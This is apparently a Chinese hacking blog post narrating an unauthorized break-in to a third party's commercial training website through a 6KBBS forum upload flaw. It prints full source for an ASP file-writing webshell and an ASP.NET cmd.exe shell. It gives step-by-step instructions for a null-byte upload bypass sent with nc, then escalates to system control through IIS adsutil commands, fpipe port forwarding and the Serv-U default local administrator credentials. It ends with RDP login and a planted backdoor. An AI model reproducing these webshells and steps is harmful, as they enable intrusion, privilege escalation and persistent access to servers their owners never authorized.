阅读提示：

注：这篇文章没有什么技术含量，只是想把一些好的思路跟大家分享出来！

  午夜3点多的时候，睡不着觉了哦！突然想起自己的有给一个跟朋友做的站好久没维护了，就登陆上去看看，这个站的论坛用用的是6Kbbs系统，本来这个站是个小的电脑公司主页，论坛也就是个摆设，没几个人去的，而6KBBS本来也就是个小型论坛程序，大的论坛都不用这个的。论坛是我以前给放的，当时是考虑到了很多因素包括安全，不需要功能很强大的。现在突然有点不放心的预感，去看看这个论坛目前有没漏洞。跑到google上一搜索，吓了我一跳。6KBBS也暴出上传漏洞。我的天啊，随便看了篇文章，按照思路去做，晕了。一个asp木马就传上去了！有点懵了！汗！回头准备将用的最新版的补上去，然后再post数据的时候，抓包显示没问题了。嘿嘿，睡觉去了。这事也就忘记了。
2天之后的又一个午夜3点，在网上找资料，无意中进了一个计算机学习站点，很大的，还有ICP认证的站。这个站上从CCNA到JAVA的培训资料都有，可惜，都是要钱的，郁郁死，不给偶们穷人看也不要把网页做的这么漂亮诱惑偶啊！

  仔细翻了翻，这个站是用的asp.net技术，想注入恐怕还没那个水平吧。又翻了翻，发现一个学员论坛，ou--ye，我简直眼珠快了掉下来，这个跟偶刚补上的论坛一模一样，并且敢肯定绝对没补上漏洞，于是战斗开始了。到论坛上注册个用户，然后到发贴页面，同时启动WsockExpert，开始抓包，这个时候上传一个asp木马： 315.asp

源代码如下：

315.asp

<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='' method=post>" %>
<% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>" %>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
<% Response.write "本文件绝对路径" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.write "<br>" %>
<% Response.write "输入马的内容:" %>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.write "<input type=submit value=保存>" %>
<% Response.write "</form>" %>
 

系统这个时候会提示文件格式不对，上传不成功，不用管，在发贴页面  查看文件原代码

    <input type="hidden" name="filepath" value="">
    <input type="hidden" name="act" value="upload">
     &nbsp;文件：
    <input type="file" name="file1" size=10>
    <input type="submit" name="Submit" value="上传"
    这是文件上传漏洞的特点，关键就在于filepath变量

将两个包包保存为 315.txt   然后用UltrEdit编辑。
 
  在Content-Disposition: form-data; name="filepath"后面第2行输入刚才那个ASP(/315.asp)的名字
  将 315.asp该为 315.gif (其实就是做一个欺骗~！HOHO~~！)
  光标移动到(/315.asp)后面空一个空格，点编辑-->HEX功能-->HEX编辑：在OD前把20该为00 后保存
 

  用NC来发送文件       nc www.xxxx.com 80<315.txt 文件上传成功 :)

   这个时候。可以通过在地址栏输入木马URL来进行进一步攻击了。将准备好的asp木马（改编自海洋顶端网木马）贴在框内，并确定好地址。然后保存，这个木马也就写到服务器上了。
然后这个时候，浏览木马所在URL，运气不错，可以运行。哇！果然是好机器啊！CPU都有4个，速度真快哦。因为有的服务器上有杀毒软件，木    马一写上去就立即被杀掉了，一般都是诺盾杀毒，以前就遇见过好几次。
   这样以后有了个完整功能的asp木马，可以正式开始下一步渗透了！
按照常规的思路，这个时候应该是通过提升webshell的权限，怎么提升，继续上传可执行文件木马撒！一个个来试，先是上传了radmin的服务端，4个文件，一个r_server.exe,名字太暴露，改成了dll32.exe，然后是radmin.reg（信息配置文件），raddrv.dll，admdll.dll。传上去后然后执行安装，可是一点反应有没，真失败，然后上传个pv.exe 查看进程，发现只能查看3个当前运行的程序，看来权限太低了，怎么办。继续试吧。又把风雪的服务端配置好传上去，执行倒是执行了，连接的时候发现被拒绝，看来机器上装有firewall，废话，这么牛X的服务器，没个防火墙怎么行。想起手里还有可以穿过防火墙反向连接的后门，可是传上去也还是不行，晕死。对了，忘记对这个机器进行系统扫描了。于是拿出GFI LANSCANNER，最新版的，结果什么信息也没扫倒，算了，我也懒得去扫了，这个季节只要是个正儿八经的网站还会有系统漏洞让你钻空子吗？那些管理员可都不是吃干饭的哦！最后没辙了，看来提升权限的事的确不好做啊，发愣了半天。记起这个站的页面是aspx的，于是连忙上传个cmd.aspx。源代码如下：

cmd.aspx

<%@ Page Language="VB" Debug="true" %>
<%@ Import Namespace="system.IO" %>
<script runat="server">
sub runcmd(Src As Object, E As EventArgs)
       dim but as string
       dim tempfile as string=server.MapPath(".") & "\" & "test.txt"
       shell("cmd.exe /c " & cmd.text & " > " & tempfile,,true,20000)
       dim myread as new streamreader(tempfile,encoding.default)
       but=replace(myread.readtoend,vbcrlf,"<br>")
       but=replace(but," ","&nbsp;")
       result.text=but
       myread.close
       file.exists(tempfile)
       file.delete(tempfile)
       cmd.text=""
end sub
</script>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>ASP.NET Shell by lake2</title>
</head>
<body>
<form runat="server">
  <asp:TextBox ID="cmd" runat="server" />
  <asp:Button ID="Button" runat="server" Text="Run" OnClick="runcmd" /> 
  <p>
    <asp:Label ID="result" runat="server" />      </p>
</form>
</body>
</html>

这个时候在URL运行cmd.aspx，
可以查看用管理员权限的用户，但是就是不能添加，执行命令的权限依然是低。其实换了个aspx的shell跟asp木马一样。有时候就这样，病急乱投医。
 现在问题很复杂，机器上有杀毒软件（敢肯定没有及时升级），常规木马上去都被杀，而且即使能运行，防火墙又封着了。
 这个时候运行这个cmd.aspx时候，发送“net start”命令，发现terminal services ，而且端口没改，看来如果能够获得一个管理员权限的帐号就是最捷径的办法了。
看到过有篇文章，是如何提高asp木马权限的，方法我也搬来了，
把解释asp脚本的 C:\WINNT\System32\inetsrv\asp.dll
这个ISAPI程序添加到/LM/W3SVCInProcessIsapiApps里面
首先我看看iis的配置。和asp木马的权限
adsutil.vbs get /W3SVC/InProcessIsapiApps
先用下面命令取得当前的InProcessIsapiApps列表：
c:\winnt\sytem32\inetsrv>cscript.exe adsutil.vbs get /W3SVC/InProcessIsapiApps
inprocessisapiapps :(LIST) (5 Items)
"c:\winnt\system32\idq.dll"
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\ssinc.dll"
"c:\winnt\system32\nswprt.dll"
---没有asp
然后把asp.dll加进/LM/W3SVCInProcessIsapiApps里面
c:\winnt\sytem32\inetsrv>adsutil.vbs set /W3SVC/InProcessIsapiApps
"c:\winnt\system32\inetsrv\asp.asp"
"c:\winnt\system32\idq.dll"
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\ssinc.dll"
"c:\winnt\system32\nswprt.dll"

   可是不行，这个方法适合占领系统留下后门，而我现在只有个小的可怜的webshell啊。
突然又记起来了，在运行net start的时候看到这个机器上开了serv-u ftp server，嘿嘿，刚好自己机器上也装了serv-u ftp服务器，这个玩意功能多的吓人，于是思路出来了。。
  从ASP木马上传fpipe.exe， 把它传到此网页目录下！传好后，咱们来执行它！在ASP目录里执行！d:\xxxx\fpipe -v -l 2500 -r 43958 IP  好！监听端口2500，打开本地SERV-U添加一台服务器，来连接2500！

填上服务器IP，监听端口号2500，填上帐户和密码！user：LocalAdministrator pass：#l@$ak#.lk;0@P全部搞定后，来连接SERV-U，连接成功后，我们就对此服务器的Serv-U有了完全控制权限！我们建立一个FTP帐户：user:admin  pass:XXXX把帐户的连接路径设置在系统盘下（例如C:\）！帐户权限全部分配（最好还提升至系统管理员）然后，我们打开CMD！

好了，现在已经获得系统权限了，直接从3389登陆！

OK！机器不错，留个后门，以后养着，，有价值啊！
最后希望大家进入了这样的机器，别去破坏别人的服务器或数据，毕竟大家都不容易！
有任何问题或对此文有意见的请与我联系。

您对本文章有什么意见或着疑问吗？请到论坛讨论您的关注和建议是我们前行的参考和动力